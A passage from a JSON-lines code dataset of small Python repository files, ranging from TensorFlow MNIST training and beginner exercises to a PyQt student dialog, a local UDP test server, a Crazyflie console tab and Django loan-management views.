train_y})\n cost_history = np.append(cost_history, cost)\n correct_prediction = tf.equal(tf.argmax(y,1), tf.arg_max(y_, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n pred_y = sess.run(y, feed_dict={x: test_x})\n mse = tf.reduce_mean(tf.square(pred_y - test_y))\n mse_ = sess.run(mse)\n mse_history.append(mse_)\n accuracy = sess.run(accuracy, feed_dict={x: train_x, y_:train_y})\n accuracy_history.append(accuracy)\n print('epoch: ', epoch, ' - ', 'cost: ', cost, '- MSE: ', mse_, '- Train Accuracy: ', accuracy)\n ","repo_name":"knecht-d/machineLearning","sub_path":"assets/listings/nnTrain.py","file_name":"nnTrain.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20042770842","text":"MENU = {\n \"espresso\": {\n \"ingredients\": {\n \"water\": 50,\n \"coffee\": 18,\n },\n \"cost\": 1.5,\n },\n \"latte\": {\n \"ingredients\": {\n \"water\": 200,\n \"milk\": 150,\n \"coffee\": 24,\n },\n \"cost\": 2.5,\n },\n \"cappuccino\": {\n \"ingredients\": {\n \"water\": 250,\n \"milk\": 100,\n \"coffee\": 24,\n },\n \"cost\": 3.0,\n }\n}\n\nresources = {\n \"water\": 300,\n \"milk\": 200,\n \"coffee\": 100,\n \"money\": 0,\n}\n\nrequired_water = 0\nrequired_milk = 0\nrequired_coffee = 0\n\n# TODO: 5. A function to check if present resources are sufficient to get the drink. If no enough resources, \"Sorry not enough water/ milk/ coffee.\"\ndef get_resources():\n print(f\"Water : {resources['water']}ml\")\n print(f\"Milk : {resources['milk']}ml\")\n print(f\"Coffee : {resources['coffee']}g\")\n print(f\"Money : ${resources['money']}\")\n\n\ndef are_enough_resources(drink):\n global required_water, required_coffee, required_milk\n drink_ingredients = MENU[drink][\"ingredients\"]\n for ingredient in drink_ingredients:\n if ingredient == \"water\":\n required_water = drink_ingredients[ingredient]\n elif ingredient == \"coffee\":\n required_coffee = drink_ingredients[ingredient]\n else:\n required_milk = drink_ingredients[ingredient]\n available_water = resources[\"water\"]\n available_milk = resources[\"milk\"]\n available_coffee = resources[\"coffee\"]\n if required_water > available_water:\n print(\"Sorry, there is not enough water in the machine.\")\n return False\n elif required_milk > available_milk:\n print(\"Sorry, there is not enough milk in the machine.\")\n return False\n elif required_coffee > available_coffee:\n print(\"Sorry, there is not enough coffee in the machine.\")\n return False\n else:\n return True\n\n\n# TODO: 6. If enough resources are available, then only prompt user to insert coins.\ndef user_provides_money():\n print(\"Please insert coins.\")\n quarters_inserted = int(input(\"how many quarters ?: \"))\n dimes_inserted = int(input(\"how many dimes ?: \"))\n nickles_inserted = int(input(\"how many nickles ?: \"))\n pennies_inserted = int(input(\"how many pennies ?: \"))\n return quarters_inserted, dimes_inserted, nickles_inserted, pennies_inserted\n\n\n# TODO: 7. Calculate the value of inserted coins\ndef calculate_value_of_coins():\n quarters, dimes, nickles, pennies = user_provides_money()\n total_input_money = (0.25 * quarters) + (0.10 * dimes) + (0.05 * nickles) + (0.01 * pennies)\n return total_input_money\n\n# TODO: 9. If money is enough, cost of drink is added to the money in resources dictionary and this should reflect in report\n# TODO: 10. If money is more than required, calculate change to be given (Change to be rounded to 2 decimal places). 
\"Here is $2.45 dollars in change.\"\ndef money_and_change_adjustment(user_money, drink_cost):\n change = 0.0\n resources[\"money\"] += drink_cost\n if user_money > drink_cost:\n change = round(user_money - drink_cost, 2)\n print(f\"Here is ${change} dollars in change.\")\n\n# TODO: 8. Check if inserted money is enough for drink or not. If money is not enough, print \"Sorry that's not enough money. Money refunded.\"\ndef is_money_enough(drink):\n input_money = calculate_value_of_coins()\n drink_cost = MENU[drink][\"cost\"]\n if input_money < drink_cost:\n print(\"Sorry that's not enough money. Money refunded.\")\n return False\n else:\n money_and_change_adjustment(user_money = input_money,drink_cost = drink_cost)\n return True\n\n# TODO: 11. After money is enough, resources are enough, then deduct resources needed for drink and update remaining resources.\ndef deduct_resources():\n resources[\"water\"] -= required_water\n resources[\"milk\"] -= required_milk\n resources[\"coffee\"] -= required_coffee\n\n#TODO: Last - Reset the used global variables again if any towards the end of the while loop\ndef reset_required_drink_values():\n global required_water, required_coffee, required_milk\n required_water = 0\n required_milk = 0\n required_coffee = 0\n\n\n# TODO: 1. Create a user input prompt to get user response to decide what is to be done. TODO: 2. This prompt should\n# be there even after an action is done or even after resources are gone - continuous while loop\ncoffee_machine_on = True\nwhile coffee_machine_on:\n user_prompt = input(\" What would you like? (espresso/latte/cappuccino): \")\n # TODO: 3. Coffe machine should only be turned off using 'off' keyword. while loop should stop only after 'off'\n # is entered.\n if user_prompt == \"off\":\n coffee_machine_on = False\n # TODO: 4. When 'report' is entered , we should get current resource values from resources dictionary\n elif user_prompt == \"report\":\n get_resources()\n elif user_prompt == \"espresso\" or user_prompt == \"latte\" or user_prompt == \"cappuccino\":\n resources_available = are_enough_resources(user_prompt)\n if resources_available:\n if is_money_enough(user_prompt):\n deduct_resources()\n # TODO: 12. At last, print message for user - \"Here is your {drink}. Enjoy!\"\n print(f\"Here is your {user_prompt}. Enjoy! ☕\")\n else:\n print(\"Sorry, we don't have this in our menu !!!\")\n reset_required_drink_values()\n","repo_name":"hitikabhatia/100_days_of_code_python_challenge","sub_path":"Coffee Machine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7770896604","text":"\"\"\" Chico tem 1,50 metro e cresce 4 centímetros por ano, \nenquanto Zé tem 1,30 metro e cresce 6 centímetros por ano. \nConstrua um algoritmo que calcule e imprima quantos anos serão \nnecessários para que Zé seja maior que Chico. 
\"\"\"\n\nchico = float(1.50)\nZé = float(1.30)\ncontador = 0\n\nwhile Zé < chico:\n chico += 0.04\n Zé += 0.06\n contador +=1\ncontador +=1\nprint(contador)\n","repo_name":"MateusFagunddes/python_logica","sub_path":"lista 3/exc4.py","file_name":"exc4.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11592493615","text":"import tensorflow as tf\nsess = tf.InteractiveSession()\n\n\n#importing MNIST data\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets('MNIST_data', one_hot=True)\n\n\n#Building full computational Graph\n#Inputs and Outputs\nx = tf.placeholder(tf.float32, shape=[None, 784])\ny_ = tf.placeholder(tf.float32, shape=[None, 10])\n\n#weights and Baises\nW = tf.Variable(tf.zeros([784,10]))\nb = tf.Variable(tf.zeros([10]))\n\n\n\n#predicted output\n\n#using softamx function\ny = tf.nn.softmax(tf.matmul(x, W) + b)\ncross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y), reduction_indices=[1]))\n\n#using softmax with logits\n# y = tf.matmul(x,W) + b\n# cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y))\n\n\n#training=tf.train.GradientDescentOptimizer(1.0).minimize(cross_entropy)\n#training=tf.train.AdamOptimizer(0.005).minimize(cross_entropy)\n#training=tf.train.AdagradOptimizer(0.2).minimize(cross_entropy)\n#training=tf.train.AdadeltaOptimizer(20).minimize(cross_entropy)\n#training=tf.train.MomentumOptimizer(0.1,0.1).minimize(cross_entropy)\ntraining=tf.train.RMSPropOptimizer(0.01).minimize(cross_entropy)\n\n\n#initializing variables\n#Must initialize after optimiser because some optimisers like AdamOptimiser create variables\nsess.run(tf.global_variables_initializer())\n\nfor _ in range(1000):\n batch_xs, batch_ys = mnist.train.next_batch(100)\n sess.run(training, feed_dict={x: batch_xs, y_: batch_ys})\n\n#evaluation\n#comparing indeces maximum element of both arrays\nprediction = tf.equal(tf.argmax(y,1), tf.argmax(y_,1))\naccuracy = tf.reduce_mean(tf.cast(prediction, tf.float32))\nprint(sess.run(accuracy, feed_dict={x: mnist.test.images, y_: mnist.test.labels}))\n","repo_name":"venkatesh-sg/neural-networks","sub_path":"MNIST_Classification/Mnist_softmaxTensorFlow.py","file_name":"Mnist_softmaxTensorFlow.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13810067747","text":"from operators.oracle_query_to_csv import execute as OracleQueryToCSVExecute\r\nfrom operators.oracle_query import execute as OracleQueryExecute\r\nfrom operators.oracle_import_csv import execute as OracleImportCSVExecute\r\nimport os\r\nfrom urllib.parse import quote_plus\r\n\r\n# define OracleQueryToCSVExecute args\r\norigin_db_host = os.getenv(\"\")\r\norigin_db_port = str(os.getenv(\"\"))\r\norigin_db_name = os.getenv(\"\")\r\norigin_db_usr = os.getenv(\"\")\r\norigin_db_pwd = quote_plus(os.getenv(\"\"))\r\norigin_sql_query = open('').read()\r\norigin_output_folder = ''\r\norigin_output_file_name = __file__ # full path of the current file\r\norigin_output_file_name = os.path.basename(origin_output_file_name) # File name\r\norigin_output_file_name = os.path.splitext(origin_output_file_name)[0] # Remove extrension\r\n\r\n# define OracleImportCSVExecute args\r\ndestination_csv_folder = f'.\\\\automation\\\\{origin_output_folder}\\\\output'\r\ndestination_db_host = os.getenv(\"\")\r\ndestination_db_port = 
str(os.getenv(\"\"))\r\ndestination_db_name = os.getenv(\"\")\r\ndestination_db_usr = os.getenv(\"\")\r\ndestination_db_pwd = quote_plus(os.getenv(\"\"))\r\ndestination_db_schema = ''\r\ndestination_db_table = ''\r\ndestination_tb_columns = []\r\n\r\n# define OracleImportCSVExecute args\r\ndelete_sql_query = open('.\\\\automation\\\\sql\\\\delete_by_period.sql').read()\r\ndelete_sql_params = {\r\n \"db_schema\": '',\r\n \"db_table\": '',\r\n \"tb_dt_filter\": '',\r\n \"start_date\": '',\r\n \"end_date\": ''\r\n}\r\n\r\n#OracleQueryToCSVExecute(origin_db_host,origin_db_port,origin_db_name,origin_db_usr,origin_db_pwd,origin_sql_query,origin_output_folder,origin_output_file_name)\r\n# test how to filter the period to delete old data\r\n#OracleQueryExecute(destination_db_host,destination_db_port,destination_db_name,destination_db_usr,destination_db_pwd,delete_sql_query,delete_sql_params)\r\nOracleImportCSVExecute(destination_csv_folder,destination_db_host,destination_db_port,destination_db_name,destination_db_usr,destination_db_pwd,destination_db_schema,destination_db_table,destination_tb_columns)","repo_name":"moraesmm/code","sub_path":"automation/f_employee_insert_process.py","file_name":"f_employee_insert_process.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10375774335","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nn, k = map(int, input().split())\r\na = list(map(int, input().split()))\r\n\r\n\r\ndef merge(arr, left, mid, right):\r\n global k\r\n\r\n i, j = left, mid+1\r\n res = []\r\n while i <= mid and j <= right:\r\n if arr[i] <= arr[j]:\r\n res.append(arr[i])\r\n k -= 1\r\n if k == 0:\r\n print(arr[i])\r\n return\r\n i += 1\r\n else:\r\n res.append(arr[j])\r\n k -= 1\r\n if k == 0:\r\n print(arr[j])\r\n return\r\n j += 1\r\n\r\n while i <= mid:\r\n res.append(arr[i])\r\n k -= 1\r\n if k == 0:\r\n print(arr[i])\r\n return\r\n i += 1\r\n while j <= right:\r\n res.append(arr[j])\r\n k -= 1\r\n if k == 0:\r\n print(arr[j])\r\n return\r\n j += 1\r\n\r\n for idx in range(left, right+1):\r\n arr[idx] = res[idx-left]\r\n return arr\r\n\r\n\r\ndef merge_sort(arr, left, right):\r\n if left < right:\r\n mid = (left + right) // 2\r\n merge_sort(arr, left, mid)\r\n merge_sort(arr, mid+1, right)\r\n merge(arr, left, mid, right)\r\n\r\n\r\nmerge_sort(a, 0, len(a)-1)\r\nif k >= 1:\r\n print(-1)\r\n","repo_name":"yejin7211/Algorithm","sub_path":"백준/Silver/24060. 
알고리즘 수업 - 병합 정렬 1/알고리즘 수업 - 병합 정렬 1.py","file_name":"알고리즘 수업 - 병합 정렬 1.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20852589961","text":"import os\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\ndef __merge_lists(base, settings, name):\n if not base.get(name):\n base[name] = []\n items = settings.get(name, [])\n for item in items:\n if item not in base[name]:\n base[name].append(item)\n\n\ndef merge_installed_apps(base, settings):\n __merge_lists(base, settings, 'INSTALLED_APPS')\n\n\ndef merge_hexdi_modules_list(base, settings):\n __merge_lists(base, settings, 'HEXDI_MODULES_LIST')\n\n\nMANUAL_MERGE = {\n 'INSTALLED_APPS': merge_installed_apps,\n 'HEXDI_MODULES_LIST': merge_hexdi_modules_list\n}\n\n\ndef module_to_dict(mdl):\n return mdl.__dict__\n\n\ndef merge_settings(base, settings):\n for item in settings:\n if item not in MANUAL_MERGE:\n base[item] = settings[item]\n for manual in MANUAL_MERGE:\n if manual in settings:\n MANUAL_MERGE[manual](base, settings)\n","repo_name":"InfinityEngine/hextrack-server","sub_path":"src/hextrack/settings/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35503147635","text":"from pyfiglet import Figlet\n\ntree = r\"\"\"\n _-_\n /~~ ~~\\\n /~~ ~~\\\n { }\n \\ _- -_ /\n ~ \\\\ // ~\n _- - | | _- _\n _ - | | -_\n // \\\\\n\n\"\"\".split('\\n')\n\ndef intro():\n fig = Figlet(font='big', width=118, justify='center')\n fig = fig.renderText('Stem volume calculator')\n\n for i in range(len(tree)):\n print(tree[i].ljust(100), tree[i])\n\n print(fig)\n\n for i in range(len(tree)):\n print(tree[i].ljust(100), tree[i])","repo_name":"Jen-Wenzel/stem_vol_calc","sub_path":"code/ascii_art.py","file_name":"ascii_art.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74399535734","text":"from PyQt6.QtWidgets import QDialog, QVBoxLayout, QLineEdit, QComboBox, QPushButton\r\nimport sqlite3\r\n\r\n\r\nclass AddDialog(QDialog):\r\n def __init__(self):\r\n super().__init__()\r\n print(\"add dialog class has been initiated\")\r\n self.setWindowTitle(\"Add Student\")\r\n self.setFixedWidth(300)\r\n self.setFixedHeight(300)\r\n\r\n layout = QVBoxLayout()\r\n\r\n # Add student name\r\n self.student_name = QLineEdit()\r\n self.student_name.setPlaceholderText(\"Enter student's name\")\r\n layout.addWidget(self.student_name)\r\n\r\n print(\"About to start the combo Box\")\r\n # Add a combo box for courses\r\n self.course = QComboBox()\r\n course_name = ['Astronomy', 'Biology', 'Math', 'Physics']\r\n self.course.addItems(course_name)\r\n layout.addWidget(self.course)\r\n\r\n # Add a phone number\r\n self.phone = QLineEdit()\r\n self.phone.setPlaceholderText(\"Enter phone number\")\r\n layout.addWidget(self.phone)\r\n\r\n # register push button\r\n submit_btn = QPushButton(\"Register\")\r\n submit_btn.clicked.connect(self.addStudent)\r\n layout.addWidget(submit_btn)\r\n\r\n self.setLayout(layout)\r\n\r\n # add an addStudent method to add students to the \"database.db\"\r\n def addStudent(self):\r\n # print(\"Add Student initiated\")\r\n name = self.student_name.text()\r\n st_course = self.course.itemText(self.course.currentIndex())\r\n 
st_phone = self.phone.text()\r\n\r\n con = sqlite3.connect(\"database.db\")\r\n # print(\"Database has been connected\")\r\n\r\n cursor = con.cursor()\r\n # print(\"Cursor has been set\")\r\n\r\n cursor.execute(\"INSERT INTO students (name, course, mobile) VALUES (?, ?, ?)\", (name, st_course, st_phone))\r\n # print(\"Student has been added\")\r\n\r\n con.commit()\r\n cursor.close()\r\n con.close()\r\n self.accept()\r\n\r\n\r\n\r\n","repo_name":"emmaMarful/student_management_system","sub_path":"Dialogs.py","file_name":"Dialogs.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39237193211","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTest additional, independent UDP server - open, receive, close.\n\n@author: ssklykov\n\"\"\"\n# %% Imports\nimport socket\nimport time\n# import numpy as np\n\n# %% Parameters\nhost = 'localhost'\nport_py_main = 5005 # number of the first ports of that will be opened\nport_py = 5010 # number of the first ports of that will be opened\nport_LV = 5100\nst_n_bytes = 1024\n\n# %% Test independent transfer - mainServer is opened below by \"with\" operator\nwith socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as mainServer:\n mainServer.bind((host, port_py_main))\n flag = True\n print(\"Python UDP Server launched\")\n\n while flag:\n (command, address) = mainServer.recvfrom(st_n_bytes)\n command = str(command, encoding='utf-8') # Conversion to a normal string\n if \"Ping\" in command:\n print(command, '- received command')\n sendingString = \"Echo\"\n sendingString = sendingString.encode() # to utf-8\n mainServer.sendto(sendingString, address)\n\n elif \"Open port\" in command:\n print(command, '- received command')\n sendingString = \"port \" + str(port_py) + \" will be opened\"\n sendingString = sendingString.encode() # to utf-8\n mainServer.sendto(sendingString, address)\n receiver = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n try:\n receiver.bind((host, port_py))\n (data, address) = receiver.recvfrom(st_n_bytes)\n # print(\"from:\", address)\n data = str(data, encoding='utf-8')\n print(\"Received:\", data)\n sendingString = \"port \" + str(port_py) + \" OPENED\"\n sendingString = sendingString.encode() # to utf-8\n receiver.sendto(sendingString, address)\n time.sleep(0.25)\n finally:\n receiver.close()\n\n elif \"QUIT\" in command:\n print(command, '- received command')\n # Do the quiting action with a delay\n mainServer.sendto(sendingString, address)\n time.sleep(0.15) # A delay for preventing of closing connection automatically by Python (causing errors)\n flag = False\n break\n\n # time.sleep(1)\n","repo_name":"sklykov/sup_lv_proj","sub_path":"LV_Py_img_tr/scripts/addition_UDP_server.py","file_name":"addition_UDP_server.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3469357956","text":"emails = ['diksonnn@gmail.com', 'dikson_santos@outlook.com',\n 'gowdikson@hotmail.com', 'dikson.enterprise@gmail.com']\n\n\ndef filtra(lista, texto):\n filtrada = []\n for item in lista:\n if texto in item:\n filtrada.append(item)\n return filtrada\n\n\nprint(f\"Gmails: {filtra(emails, 'gmail')}\")\n\nprint(f\"Hotmails: {filtra(emails, 
'hotmail.com')}\")\n","repo_name":"DiksonSantos/PYTHON_REV_BASICO_2021","sub_path":"MODULO_14_FUNCTIONS_DEF/07_Filtrando_String_DEF.py","file_name":"07_Filtrando_String_DEF.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70594377652","text":"from sklearn.model_selection import train_test_split\nfrom sklearn import datasets\n\nfrom Perceptron import Perseptron\nX, y = datasets.make_blobs(n_samples=500, n_features=3,\n centers=2, cluster_std=3, random_state=2)\nx_train, x_test, y_train, y_test = train_test_split(\n X, y, test_size=0.2, random_state=2)\n\n\n# plt.scatter(x_train[:, 0], x_train[:, 1], marker='o', c=y_train)\n# plt.show()\n\np = Perseptron(500)\np.fit(x_train, y_train)\n\ny_predicted = p.predict(x_test)\nEout = sum(abs(y_predicted[:, 0] - y_test))/len(y_test)\nprint(p.Error)\n","repo_name":"maArami/Ml","sub_path":"Perceptron/perceptron_test.py","file_name":"perceptron_test.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27107356273","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 17 21:43:59 2017\n\n@author: Dean\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ntestLen = 1000\nnoiseLevel = 0.01\nsinInput4 = np.zeros((3,testLen))\nrd = np.random.normal(1, noiseLevel, (testLen))\nsinInput4[0] = ((np.sin(np.linspace(0, 10*np.pi, testLen))+5)*rd).reshape((testLen))\nrd = np.random.normal(1, noiseLevel, (testLen))\nsinInput4[1] = ((np.sin(np.linspace(0, 18*np.pi, testLen)+1)+10)*rd).reshape((testLen))*2\nrd = np.random.normal(1, noiseLevel, (testLen))\nsinInput4[2] = ((np.sin(np.linspace(0, 30*np.pi, testLen)-1)+21)*rd).reshape((testLen))*3\n\n\nif __name__ == \"__main__\":\n inSeq = sinInput4\n for i in range(inSeq.shape[0]):\n plt.plot(inSeq[i,:])\n plt.show()\n\ndef GetInSeq():\n return sinInput4","repo_name":"DeanIsMe/Overzealous_Oracle","sub_path":"scripts/TestSequences.py","file_name":"TestSequences.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"34191974297","text":"import logging\n\nfrom PyQt6 import uic\nfrom PyQt6.QtCore import pyqtSignal\nfrom PyQt6.QtGui import QTextCursor\n\nimport cfclient\nfrom cfclient.ui.tab_toolbox import TabToolbox\n\n__author__ = 'Bitcraze AB'\n__all__ = ['ConsoleTab']\n\nlogger = logging.getLogger(__name__)\n\nconsole_tab_class = uic.loadUiType(cfclient.module_path +\n \"/ui/tabs/consoleTab.ui\")[0]\n\n\nclass ConsoleTab(TabToolbox, console_tab_class):\n \"\"\"Console tab for showing printouts from Crazyflie\"\"\"\n _link_established_signal = pyqtSignal(str)\n _connected_signal = pyqtSignal(str)\n _disconnected_signal = pyqtSignal(str)\n _update = pyqtSignal(str)\n\n def __init__(self, helper):\n super(ConsoleTab, self).__init__(helper, 'Console')\n self.setupUi(self)\n\n # Always wrap callbacks from Crazyflie API though QT Signal/Slots\n # to avoid manipulating the UI when rendering it\n self._link_established_signal.connect(self._link_established)\n self._connected_signal.connect(self._connected)\n self._disconnected_signal.connect(self._disconnected)\n self._update.connect(self.printText)\n\n self._helper.cf.console.receivedChar.add_callback(self._update.emit)\n self._helper.cf.connected.add_callback(self._connected_signal.emit)\n 
self._helper.cf.link_established.add_callback(self._link_established_signal.emit)\n self._helper.cf.disconnected.add_callback(\n self._disconnected_signal.emit)\n\n self._clearButton.clicked.connect(self.clear)\n self._dumpSystemLoadButton.clicked.connect(\n lambda enabled:\n self._helper.cf.param.set_value(\"system.taskDump\", '1'))\n self._dumpAssertInformation.clicked.connect(\n lambda enabled:\n self._helper.cf.param.set_value_raw(\"system.assertInfo\", 0x08, 1))\n self._propellerTestButton.clicked.connect(\n lambda enabled:\n self._helper.cf.param.set_value(\"health.startPropTest\", '1'))\n self._batteryTestButton.clicked.connect(\n lambda enabled:\n self._helper.cf.param.set_value(\"health.startBatTest\", '1'))\n self._storageStatsButton.clicked.connect(\n lambda enabled:\n self._helper.cf.param.set_value(\"system.storageStats\", '1'))\n\n def printText(self, text):\n # Make sure we get printouts from the Crazyflie into the log (such as\n # build version and test ok/fail)\n logger.debug(\"[%s]\", text)\n scrollbar = self.console.verticalScrollBar()\n prev_scroll = scrollbar.value()\n prev_cursor = self.console.textCursor()\n was_maximum = prev_scroll == scrollbar.maximum()\n\n self.console.moveCursor(QTextCursor.MoveOperation.End)\n self.console.insertPlainText(text)\n\n self.console.setTextCursor(prev_cursor)\n\n if was_maximum and not prev_cursor.hasSelection():\n scrollbar.setValue(scrollbar.maximum())\n else:\n scrollbar.setValue(prev_scroll)\n\n def clear(self):\n self.console.clear()\n\n def _connected(self, link_uri):\n \"\"\"Callback when the Crazyflie has been connected\"\"\"\n self._dumpSystemLoadButton.setEnabled(True)\n self._propellerTestButton.setEnabled(True)\n self._batteryTestButton.setEnabled(True)\n self._storageStatsButton.setEnabled(True)\n\n def _disconnected(self, link_uri):\n \"\"\"Callback for when the Crazyflie has been disconnected\"\"\"\n self._dumpSystemLoadButton.setEnabled(False)\n self._dumpAssertInformation.setEnabled(False)\n self._propellerTestButton.setEnabled(False)\n self._batteryTestButton.setEnabled(False)\n self._storageStatsButton.setEnabled(False)\n\n def _link_established(self, link_uri):\n \"\"\"Callback when the first packet on a new link is received\"\"\"\n # Enable the assert dump button as early as possible. 
After an assert we will never get the connected() cb.\n self._dumpAssertInformation.setEnabled(True)\n","repo_name":"bitcraze/crazyflie-clients-python","sub_path":"src/cfclient/ui/tabs/ConsoleTab.py","file_name":"ConsoleTab.py","file_ext":"py","file_size_in_byte":4014,"program_lang":"python","lang":"en","doc_type":"code","stars":287,"dataset":"github-code","pt":"21"} +{"seq_id":"29645704833","text":"from datetime import datetime\nfrom django.db.models import Sum\nfrom django.shortcuts import render, redirect\nfrom django.views import View\nfrom core.models import Client, Payment, Loan, CreditScore\n\n\nclass IndexView(View):\n def get(self, request):\n current_user = request.session.get('user_id')\n\n user_credit_score = CreditScore.objects.get(client_id_id=current_user)\n latest_payments = Payment.objects.filter(client_id=request.session.get('user_id')).order_by('due_date')\n\n for p in latest_payments:\n loan = Loan.objects.get(loan_id=p.loan_id.loan_id)\n p.loan = loan\n\n # Fetch loans belonging to the current user\n loans = Loan.objects.filter(client_id=request.session.get('user_id'), status=\"Approved\")\n all_loans = Loan.objects.filter(client_id=request.session.get('user_id'))\n client = Client.objects.get(user_id=request.session.get('user_id'))\n total_loans_amount = Loan.objects.filter(client_id=request.session.get('user_id')).aggregate(\n Sum('amount_to_pay'))\n unpaid_total = Payment.objects.filter(status=\"Pending\", client_id=client.user_id).aggregate(Sum('amount'))\n paid_total = Payment.objects.filter(status=\"Paid\", client_id=client.user_id).aggregate(Sum('amount'))\n paid_total = paid_total[\"amount__sum\"] if paid_total[\"amount__sum\"] else 0\n paid_percentage = (paid_total / total_loans_amount[\"amount_to_pay__sum\"]) * 100 if paid_total > 0 else 0\n\n context = {\n \"creditscore\": user_credit_score,\n \"unpaid_total\": unpaid_total[\"amount__sum\"] if unpaid_total[\"amount__sum\"] else 0,\n \"paid_total\": paid_total,\n \"all_loans\": all_loans,\n \"loans\": loans,\n \"totalPayments\": latest_payments,\n \"paid_percentage\": \"{:.2f}\".format(paid_percentage),\n \"latestPayments\": latest_payments\n }\n\n return render(request, \"client_dashboard.html\", context)\n\n\nclass ContactUsView(View):\n def get(self, request):\n return render(request, 'Contact_Us.html')\n\n\nclass ViewLoanView(View):\n def get(self, request, loan_id):\n try:\n loan = Loan.objects.get(loan_id=loan_id)\n payments = Payment.objects.filter(loan_id=loan_id)\n client = Client.objects.get(user_id=loan.client.user_id)\n\n context = {\n \"loan\": loan,\n \"client\": client,\n \"payments\": payments,\n }\n\n return render(request, \"loan/view_loan.html\", context)\n except Loan.DoesNotExist:\n return redirect(\"/client_dashboard/\")\n\n\nclass ApplyLoanView(View):\n def get(self, request):\n user_id = request.session[\"user_id\"]\n start_date = request.GET.get(\"start_date\", None)\n end_date = request.GET.get(\"end_date\", None)\n amount = request.GET.get(\"amount\", None)\n product_name = request.GET.get(\"product_name\", None)\n\n clients = Client.objects.get(user_id=request.session[\"user_id\"])\n\n loan_length = 0\n\n context = {\n \"clients\": clients,\n }\n\n if user_id:\n context[\"user_id\"] = int(user_id)\n client = Client.objects.get(user_id=user_id)\n context[\"client\"] = client\n credit = CreditScore.objects.get(client_id=user_id)\n context[\"credit\"] = credit\n\n if credit.score > 700:\n context[\"interest\"] = 7\n elif credit.score > 500:\n context[\"interest\"] = 10\n elif 
credit.score > 400:\n context[\"interest\"] = 12\n elif credit.score > 300:\n context[\"interest\"] = 15\n\n if product_name:\n context[\"product_name\"] = product_name\n\n if start_date:\n context[\"start_date\"] = start_date\n\n if end_date:\n context[\"end_date\"] = end_date\n\n if start_date and end_date:\n # dd/mm/YY\n start_date = datetime.strptime(start_date, \"%Y-%m-%d\")\n end_date = datetime.strptime(end_date, \"%Y-%m-%d\")\n loan_length = (end_date - start_date).days // 30\n context[\"loan_length\"] = loan_length\n\n if amount:\n context[\"amount\"] = amount\n context[\"amount_to_pay\"] = int(amount) + (int(amount) * (context[\"interest\"] / 100) * (loan_length / 12))\n\n return render(request, \"client_apply.html\", context)\n\n def post(self, request, client_id):\n user_id = request.POST[\"user_id\"]\n start_date = request.POST[\"start_date\"]\n end_date = request.POST[\"end_date\"]\n product_name = request.POST[\"product_name\"]\n loan_length = request.POST[\"loan_length\"]\n amount = request.POST[\"amount\"]\n amount_to_pay = request.POST[\"amount_to_pay\"]\n interest = request.POST[\"interest\"]\n\n loan = Loan(\n client_id=user_id,\n product_name=product_name,\n start_date=start_date,\n end_date=end_date,\n amount=amount,\n amount_to_pay=float(amount_to_pay),\n loan_length=loan_length,\n interest_rate=interest,\n status=\"Pending\",\n )\n\n loan.save()\n print(loan)\n\n return redirect(\"/client\" + str(loan.loan_id))\n\n\nclass PaymentView(View):\n def get(self, request, payment_id):\n # Pay loan\n payment = Payment.objects.get(payment_id=payment_id)\n payment.status = \"Paid\"\n payment.date_paid = datetime.today()\n payment.is_late = payment.date_paid.date() > payment.due_date\n\n payment.save()\n\n return redirect(request.META.get('HTTP_REFERER'))\n\n\nclass ViewLoanView(View):\n def get(self, request, loan_id):\n try:\n loan = Loan.objects.get(loan_id=loan_id)\n payments = Payment.objects.filter(loan_id=loan_id)\n client = Client.objects.get(user_id=loan.client.user_id)\n\n # payments = list(payments).sort(key=lambda r: r.due_date)\n\n current_outstanding = 0\n for p in payments:\n if p.status == \"Pending\":\n current_outstanding += p.amount\n\n context = {\n \"loan\": loan,\n \"client\": client,\n \"payments\": payments,\n \"current_outstanding\": current_outstanding\n }\n\n return render(request, \"view_loan.html\", context)\n except Loan.DoesNotExist:\n return 